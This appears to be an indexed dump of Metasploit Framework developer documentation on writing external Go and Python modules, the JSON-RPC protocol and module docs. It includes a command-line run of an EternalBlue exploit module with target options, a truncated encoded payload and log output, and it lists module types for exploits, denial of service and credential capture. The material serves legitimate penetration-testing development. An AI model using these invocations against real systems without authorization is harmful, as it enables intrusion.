module&amp;gt;) } . | . FULL EXAMPLE . Note: Above does not outline the full potential list of metadata options . Currently supported module types: . | remote_exploit | remote_exploit_cmd_stager | capture_server | dos | single_scanner | single_host_login_scanner | multi_scanner | . 4. Shared Code . | For code that is shared specific to your module create a directory in your module directory: shared/src/ metasploit will automatically add these to the GOPATH | For code that you think could be used across modules, add code here | 3rd party libs aren’t currently supported but we welcome patches | . 5. Finalize . | Test your Pull Request | Create a Pull Request | No coding standard here, be sure to gofmt | . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-golang-modules.html",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-golang-modules.html"
  },"851": {
    "doc": "Overview",
    "title": "Request Flow",
    "content": "Each time Metasploit wants an external module to do something (ex. describe itself or run with a certain configuration), it runs the module in a new process and talks to it over stdin/stdout. To get the metadata from a module (which includes options), the call sequence looks a bit like: . +------------+ | Metasploit | | Describe yourself +-------------------+ | +-------------------&amp;gt; | some_module.py | | | | | | Some metadata | | &amp;lt;-------------------+ | | | | +-------------------+ | | +------------+ . A module run might look like: . +------------+ | Metasploit | Do a thing with | these options +-------------------+ | +-------------------&amp;gt; | some_module.py | | | | | | A bit of status | | &amp;lt;-------------------+ | | | | Moar status | | &amp;lt;-------------------+ | | | | I found a thing | | &amp;lt;-------------------+ | | | | +-------------------+ | +------------+ . When a module meant for a single host is run against a range of hosts, Metasploit will start a new process for each host. If the THREADS datastore option is set and it is an auxiliary module, that many processes will be run at the same time. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#request-flow",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#request-flow"
  },"852": {
    "doc": "Overview",
    "title": "JSON-RPC API",
    "content": "External modules communicate with Metasploit over stdin/stdout. The methods a module must implement are describe and run; additional methods can be advertised in the capabilities array, for now assumed to use a subset of the options used for run. Metasploit implements message and will implement report in the near future. The specs for each method are written below using JSON-schema. Work still needs to be done enumerating valid types and codes for the messages. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#json-rpc-api",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#json-rpc-api"
  },"853": {
    "doc": "Overview",
    "title": "Describe",
    "content": "Request . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"params\", \"method\", \"jsonrpc\", \"id\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"id\": {\"type\": \"string\"}, \"method\": {\"enum\": [\"describe\"]}, \"params\": {\"type\": \"object\"} } } . Response . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"jsonrpc\", \"result\", \"id\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"id\": {\"type\": \"string\"}, \"result\": { \"type\": \"object\", \"required\": [\"name\", \"description\", \"authors\", \"type\", \"options\", \"capabilities\"], \"properties\": { \"name\": {\"type\": \"string\"}, \"description\": {\"type\": \"string\"}, \"authors\": {\"type\": \"array\", \"items\": {\"type\": \"string\"}}, \"date\": {\"type\": \"string\"}, \"references\": { \"type\": \"array\", \"items\": { \"type\": \"object\", \"required\": [\"type\", \"ref\"], \"properties\": { \"type\": {\"type\": \"string\"}, \"ref\": {\"type\": \"string\"} } } }, \"type\": {\"enum\": [\"remote_exploit.cmd_stager.wget\"]}, \"privileged\": {\"type\": \"boolean\"}, \"targets\": { \"type\": \"array\", \"items\": { \"type\": \"object\", \"required\": [\"platform\", \"arch\"], \"properties\": { \"platform\": {\"type\": \"string\"}, \"arch\": {\"type\": \"string\"} } } }, \"options\": { \"type\": \"object\", \"additionalProperties\": false, \"patternProperties\": { \"^[^=]*$\": { \"type\": \"object\", \"required\": [\"type\", \"description\", \"required\", \"default\"], \"properties\": { \"required\": {\"type\": \"boolean\"}, \"default\": {\"type\": [\"null\", \"string\", \"number\", \"boolean\", \"object\", \"array\"]}, \"description\": {\"type\": \"string\"}, \"type\": {\"type\": \"string\"} } } } }, \"capabilities\": { \"type\": \"array\", \"items\": { \"type\": \"string\" } } } } } } . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#describe",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#describe"
  },"854": {
    "doc": "Overview",
    "title": "Run",
    "content": "Request . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"params\", \"method\", \"jsonrpc\", \"id\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"id\": {\"type\": \"string\"}, \"method\": {\"enum\": [\"run\"]}, \"params\": { \"type\": \"object\" \"additionalProperties\": false, \"patternProperties\": { \"^[^=]*$\": { \"type\": \"object\", \"required\": [\"type\", \"description\", \"required\", \"default\"], \"properties\": { \"required\": {\"type\": \"boolean\"}, \"default\": {\"type\": [\"null\", \"string\", \"number\", \"boolean\", \"object\", \"array\"]}, \"description\": {\"type\": \"string\"}, \"type\": {\"type\": \"string\"} } } } } } } . Response . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"jsonrpc\", \"id\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"id\": {\"type\": \"string\"}, \"result\": { \"type\": \"object\", \"required\": [\"message\"] \"properties\": { \"message\": {\"type\": \"string\"}, \"return\": {\"type\": \"string\"} } }, \"error\": { \"type\": \"object\", \"required\": [\"message\", \"code\"], \"properties\": { \"message\": {\"type\": \"string\"}, \"code\": {\"type\": \"number\"}, \"data\": {\"type\": \"object\"} } } } } . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#run",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#run"
  },"855": {
    "doc": "Overview",
    "title": "Message",
    "content": "Notification - no response . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"params\", \"method\", \"jsonrpc\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"method\": {\"enum\": [\"message\"]}, \"params\": { \"type\": \"object\", \"required\": [\"level\", \"message\"], \"properties\": { \"level\": {\"enum\": [\"error\", \"good\", \"warning\", \"info\", \"debug\"]}, \"message\": {\"type\": \"string\"} } } } } . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#message",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#message"
  },"856": {
    "doc": "Overview",
    "title": "Overview",
    "content": "For an introduction to the reasons and goals for external modules, see our 2017 HaXmas post on the subject. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html"
  },"857": {
    "doc": "Writing Python Modules",
    "title": "Writing Python Modules for Metasploit",
    "content": "This is an example of how to write a Python module for Metasploit Framework that uses a Python metasploit library to communicate with framework via JSON-RPC over stdin/stdout. External Python modules should support Python versions 3.5 and newer. Python 2.7 is no longer used for external modules. Execution . | Include this line at the top of your module: #!/usr/bin/env python3 | Ensure your file is marked as executable | . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#writing-python-modules-for-metasploit",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#writing-python-modules-for-metasploit"
  },"858": {
    "doc": "Writing Python Modules",
    "title": "Python Library",
    "content": "The library currently supports a few function calls that can be used to report information to Metasploit Framework. The metasploit library can be loaded into your Python module by including the following line: . from metasploit import module . The location of the metasploit library is automatically added to the PYTHONPATH environment variable before the Python module is executed. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#python-library",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#python-library"
  },"859": {
    "doc": "Writing Python Modules",
    "title": "Describe Yourself",
    "content": "Metasploit modules include information about authors of the modules, references to other sources with information about the vulnerabilities, descriptions of the modules, options, etc. Python modules need to include this metadata information as well. The structure of the data is similar to modules written in Ruby. The following is an example template of metadata information: . metadata = { 'name': '&amp;lt;name&amp;gt;', 'description': ''' &amp;lt;description&amp;gt; ''', 'authors': [ '&amp;lt;author&amp;gt;', '&amp;lt;author&amp;gt;' ], 'date': 'YYYY-MM-DD', 'license': '&amp;lt;license&amp;gt;', 'references': [ {'type': 'url', 'ref': '&amp;lt;url&amp;gt;'}, {'type': 'cve', 'ref': 'YYYY-#'}, {'type': 'edb', 'ref': '#'}, {'type': 'aka', 'ref': '&amp;lt;name&amp;gt;'} ], 'type': '&amp;lt;module type&amp;gt;', 'options': { '&amp;lt;name&amp;gt;': {'type': 'address', 'description': '&amp;lt;description&amp;gt;', 'required': &amp;lt;True/False&amp;gt;, 'default': None}, '&amp;lt;name&amp;gt;': {'type': 'string', 'description': '&amp;lt;description&amp;gt;', 'required': &amp;lt;True/False&amp;gt;, 'default': None}, '&amp;lt;name&amp;gt;': {'type': 'string', 'description': '&amp;lt;description&amp;gt;', 'required': &amp;lt;True/False&amp;gt;, 'default': None} } } . Module Type . As shown in the metadata template information, a type is also include for the module. The module type is used to select an ERB template, which generates a Ruby document for the module. The ERB templates can be found here. The following templates are currently available: . remote_exploit_cmd_stager capture_server dos single_scanner multi_scanner . The remote_exploit_cmd_stager module type is used when writing an exploit for command execution or code injection vulnerabilities and provides the command to inject into the vulnerable code based on the flavor specified for the command stager. The capture_server module type is used when a module is designed to simulate a service to capture credentials for connecting clients. The dos module type is used when the module will send packets to a remote service that will crash the service or put it in an unusable state. The single_scanner module type is used when creating a module to scan hosts without batching. The multi_scanner module type is used for modules that are going to scan hosts in batches. The batch_size option is registered in the mutli_scanner ERB template with a default of 200. Options . The options dictionary in the metadata are the options that will be available in msfconsole when the module is loaded. The options can be required (necessary for the module to run) or not (provide additional functionality). Communication . To pass the metadata information, as well as the starting function of your Python module, to msfconsole, use the module.run() function. The module.run() function takes two arguments, the first is the metadata and the second is the callback function to use when executing the module from msfconsole. The code snippet will look like the following: . def run(args): # Your code here pass if __name__ == '__main__': module.run(metadata, run) . When msfconsole sends a describe request to the Python module, the metadata information is returned. When msfconsole sends a run request to the module, the callback function, run in this example, will be called with the arguments provided to msfconsole. A LogHandler can be setup and used to communicate status information back to framework during execution of the Python module. Here is code snippet that uses the LogHandler: . import logging from metasploit import module module.LogHandler.setup(msg_prefix='logging test: ') logging.info('info') logging.error('error') logging.warning('warning') logging.debug('debug') . The module.LogHandler.setup() function is used the create a Handler and Formatter that will call module.log() with the appropriate log level. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#describe-yourself",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#describe-yourself"
  },"860": {
    "doc": "Writing Python Modules",
    "title": "Full Example",
    "content": "#!/usr/bin/env python3 # -*- coding: utf-8 -*- # standard modules import logging # extra modules dependencies_missing = False try: import requests except ImportError: dependencies_missing = True from metasploit import module metadata = { 'name': 'Python Module Example', 'description': ''' Python communication with msfconsole. ''', 'authors': [ 'Jacob Robles' ], 'date': '2018-03-22', 'license': 'MSF_LICENSE', 'references': [ {'type': 'url', 'ref': 'https://blog.rapid7.com/2017/12/28/regifting-python-in-metasploit/'}, {'type': 'aka', 'ref': 'Coldstone'} ], 'type': 'single_scanner', 'options': { 'targeturi': {'type': 'string', 'description': 'The base path', 'required': True, 'default': '/'}, 'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': None} } } def run(args): module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) if dependencies_missing: logging.error('Module dependency (requests) is missing, cannot continue') return # Your code here try: r = requests.get('https://{}/{}'.format(args['rhost'], args['targeturi']), verify=False) except requests.exceptions.RequestException as e: logging.error('{}'.format(e)) return logging.info('{}...'.format(r.text[0:50])) if __name__ == '__main__': module.run(metadata, run) . The example sends a get request to the given rhost and targeturi, then calls logging.info() on the result to have the output displayed in msfconsole. Debugging Python modules . If you want to run an external module as a standalone program from your metasploit-framework folder just specify the Python path to include the Metasploit library support and run the module directly: . $ PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py . The Python module will wait for stdin to receive JSON-RPC input. Entering the request to run the module: . { \"jsonrpc\": \"2.0\", \"id\": \"1337\", \"method\": \"run\", \"params\": { \"rhosts\": [\"127.0.0.1\"], \"rport\": \"49152\" } } . You will see the JSON-RPC responses printed to stdout: . {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"debug\", \"message\": \"127.0.0.1:49152 - Connected\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"debug\", \"message\": \"127.0.0.1:49152 - Received 5 bytes\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"127.0.0.1:49152 - Does not match\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"debug\", \"message\": \"127.0.0.1:49152 - Does not match with: bytearray(b'xxxxx')\"}} . You can pipe the JSON-RPC request as well for automation purposes: . echo '{ \"jsonrpc\": \"2.0\", \"id\": \"1337\", \"method\": \"run\", \"params\": { \"rhosts\": [\"127.0.0.1\"], \"rport\": \"49152\" } }' | PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py . The Python external modules can be run directly with command line options: . $ PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3.9 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py --help usage: att_open_proxy.py [-h] --rhosts RHOSTS [--rport RPORT] [ACTION] The Arris NVG589 and NVG599 routers configured with AT&amp;amp;T U-verse firmware 9.2.2h0d83 expose an un-authenticated proxy that allows connecting from WAN to LAN by MAC address. positional arguments: ACTION The action to take (['run']) optional arguments: -h, --help show this help message and exit --rport RPORT The target port, (default: 49152) required arguments: --rhosts RHOSTS The target address . For example: . PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py --rhosts 127.0.0.1 --rport 49152 . For exploit modules, the payload is encoded encoded using Base64 and specified in a top level payload_encoded key, implemented here. Below is an example of the (now deleted) ms17_010_eternalblue_win8.py module running: . $ cat options.json { \"jsonrpc\": \"2.0\", \"id\": \"1337\", \"method\": \"run\", \"params\": { \"VERBOSE\": true, \"RHOST\": \"192.168.144.131\", \"RPORT\": \"445\", \"GroomAllocations\": 13, \"ProcessName\": \"spoolsv.exe\", \"SMBUser\": \"test\", \"SMBPass\": \"123456\", \"payload_encoded\": \"/EiD5PDozAAA...etc...===\" } } $ cat options.json | PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 modules/exploits/windows/smb/ms17_010_eternalblue_win8.py {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"shellcode size: 1221\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"numGroomConn: 13\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"Target OS: Windows 10 Pro 10240\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"got good NT Trans response\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"got good NT Trans response\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"SMB1 session setup allocate nonpaged pool success\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"SMB1 session setup allocate nonpaged pool success\"}} . To add breakpoints to your Python code, add the below code snippet. Note that the interactive breakpoints will only work when running the external modules as standalone Python scripts, and won’t work when running from msfconsole: . import pdb; pdb.pry . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#full-example",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#full-example"
  },"861": {
    "doc": "Writing Python Modules",
    "title": "Coding with Style",
    "content": "All the Python code in Metasploit aims to be PEP 8 compliant. The biggest differences coming from Metasploit’s Ruby style: . | Two lines between functions (but not class methods) | Two lines between different types of code (like imports and the metadata, see above) | Four spaces for indenting | . Some coding choices to think about when writing your module: . | Prefer \"foo {}\".format('bar') over interpolation with % | Keep your callback methods short and readable. If it gets cluttered, break out sub-tasks into well-named functions | Variable names should be descriptive, readable, and short (a guide) | If you really need Python3 features in your module, use #!/usr/bin/env python3 for the shebang | If you have a lot of legacy code in 2.7 or need a 2.7 library, use #!/usr/bin/env python2.7 (macOS in particular does not ship with a python2 executable by default) | If possible, have your module compatible with both and use #!/usr/bin/env python | . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#coding-with-style",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#coding-with-style"
  },"862": {
    "doc": "Writing Python Modules",
    "title": "(Potentially) Common Questions",
    "content": "Why doesn’t the module appear when I search for it in msfconsole? . The module may have errors and fail to load inside of msfconsole. Check the framework log file, ~/.msf4/logs/framework.log, for error messages. Also, if the module is not marked as executable, then it will not show up when you search for it in msfconsole. Why is the output from the Python module not showing up in msfconsole? . The external modules communicate with framework via JSON-RPC. If your Python module contains print statements, framework may not recognize those as JSON-RPC requests. Use the LogHandler or module.log() to send status information, which will be displayed in msfconsole. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#potentially-common-questions",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#potentially-common-questions"
  },"863": {
    "doc": "Writing Python Modules",
    "title": "Additional Resources",
    "content": "Rapid7 Blog: Regifting Python in Metasploit . Rapid7 Blog: External Metasploit Modules: The Gift That Keeps On Slithering . Metasploit Python library . ERB Templates . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#additional-resources",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#additional-resources"
  },"864": {
    "doc": "Writing Python Modules",
    "title": "Writing Python Modules",
    "content": " ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html"
  },"865": {
    "doc": "Writing Module Documentation",
    "title": "Writing Module Documentation",
    "content": "Adding and reviewing module documentation is a great way to contribute to the Metasploit Framework. Before you write any module documentation, you should take a look at the sample template, module_doc_template.md, or take a look at any of the KBs that are already available. Writing a KB . To write a KB, you’ll need to: . | Create a markdown (.md) file. | Write the content. | Save the file and name it after the module name. For example, the filename for ms08-067 is modules/exploits/windows/smb/ms08_067_netapi.rb, so its documentation is documentation/modules/exploits/windows/smb/ms08_067_netapi.md. | Place it in the metasploit-framework/documentation/modules directory. | . Where to put the markdown files . If you go to metasploit-framework/documentation/modules, you’ll see that there are documentation directories for each module type: auxiliary, exploit, payload, and post. To figure out where you need to put the file, you’ll need to look at the module’s path. | Start msfconsole. | Type use &amp;lt;module name&amp;gt;. | Type info -d. | When the module name appears, look at the Module field. You’ll see a file path for the module. That’s the path where the KB needs to be added. | . For example: . msf&amp;gt; use auxiliary/scanner/smb/smb_login msf (smb_login)&amp;gt; info Name: SMB Login Check Scanner Module: auxiliary/scanner/smb/smb_login .... If you were creating a KB for the smb login scanner, you’d add it to metasploit-framework/documentation/modules/auxiliary/smb.md. Sections you should include in the KB . These are just suggestions, but it’d be nice if the KB had these sections: . | Vulnerable Applications - Tells users what targets are vulnerable to the module and provides instructions on how to access vulnerable targets for testing. | Verification Steps - Tells users how to use the module and what the expected results are from running the module. | Options - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required. | Scenarios - Provides sample usage and describes caveats that the user may need to be aware of when running the module. | . Before you submit your PR: msftidy_docs.rb . A documentation file can be passed as a positional argument to metasploit-framework/tools/dev/msftidy_docs.rb and will highlight formatting errors the docs file might contain. Once all the errors and warnings thrown by msftidy_docs.rb have been resolved, the documentation file is ready for submission. ➜ metasploit-framework git:(upstream-master) ✗ ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/panos_op_cmd_exec.md documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [INFO] Missing Section: ## Options documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] Please add a newline at the end of the file documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps/Module usage, Options, Scenarios documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:50 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```) documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:53 - [WARNING] Spaces at EOL . ",
    "url": "/docs/development/quality/writing-module-documentation.html",
    "relUrl": "/docs/development/quality/writing-module-documentation.html"
  }
}
</pre></body></html>